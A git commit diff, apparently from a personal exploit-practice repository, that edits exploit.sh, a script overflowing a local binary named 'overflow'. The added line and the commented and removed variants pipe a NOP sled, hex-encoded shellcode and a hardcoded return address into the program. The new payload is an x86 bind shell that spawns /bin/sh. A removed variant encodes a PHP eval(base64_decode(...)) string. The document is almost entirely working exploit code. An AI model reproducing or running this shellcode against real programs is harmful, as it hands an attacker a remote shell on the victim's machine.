diff options
| author | toni <matzeton@googlemail.com> | 2014-11-09 07:59:11 +0100 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2014-11-09 07:59:11 +0100 |
| commit | 3cf4e37c624fe1ac16ed11eb9ad167941b074e23 (patch) | |
| tree | 774fd58023faf7a92e4592fce5e51c689ab7ccb5 /exploit.sh | |
| parent | 4bb6da1dc5ec885b640365025b47b7f2a6a20d5b (diff) | |
- removed \x00 in socket.asm
- exploit.sh -> socket.o
Diffstat (limited to 'exploit.sh')
| -rwxr-xr-x | exploit.sh | 10 |
1 files changed, 4 insertions, 6 deletions
@@ -5,10 +5,8 @@ # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr -./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` +#./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` -# shellcode/simple.c -#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'` - -# shellcode/simple2.c (257 bytes) -#./overflow `python -c 'print "\x90"*117 + "\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x53\x49\x31\x30\x4a\x50\x71\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x67\x41\x41\x41\x4c\x6f\x47\x41\x41\x41\x41\x75\x41\x51\x41\x41\x41\x49\x50\x42\x63\x4e\x51\x36\x4f\x50\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x72\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x51\x41\x55\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x46\x36\x55\x67\x41\x42\x65\x42\x41\x42\x47\x77\x77\x48\x43\x4a\x41\x42\x41\x41\x41\x55\x41\x41\x41\x41\x48\x41\x41\x41\x41\x4d\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x58\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x55\x41\x41\x41\x41\x4e\x41\x41\x41\x41\x4c\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x49\x41\x41\x41\x41\x41\x45\x45\x4f\x45\x41\x41\x41\x41\x41\x41\x29\x29\x3b" + "\x90"*104 + "\x8c\xd3\xff\xff"'` +# bindshell +# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP +./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x8c\xd3\xff\xff"'` |